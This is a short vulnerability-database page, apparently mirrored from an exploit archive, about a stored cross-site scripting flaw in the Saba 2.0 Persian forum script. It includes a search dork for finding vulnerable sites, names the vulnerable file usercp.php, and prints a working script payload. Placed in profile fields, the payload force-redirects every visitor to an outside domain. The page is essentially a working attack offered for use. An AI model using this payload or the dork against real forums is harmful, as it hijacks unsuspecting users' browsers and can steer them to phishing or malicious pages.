Saba 2.0 Cross Site Scripting [PASSIVE]

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052415 漏洞类型
发布时间 2008-10-29 更新时间 2008-10-29
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008100079
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 Saba 2.0 Cross Site Scripting (JS Injection)
http://Aria-Security.com
---------------------------------------------------------------
Saba 2.0 is a Persian Forum Script 
Dork: Powered by Saba 2.0
Vulnerable file: usercp.php

usercp.php?username=YourUserName

The above script can be inserted as Location, Yahoo ID and other fields in the usercp page.. 

<script> document.write('<meta  http-equiv="refresh" content="0; url=http://Aria-Security.com/index.html">'); </script>


The-0utl4w
Aria-Security Team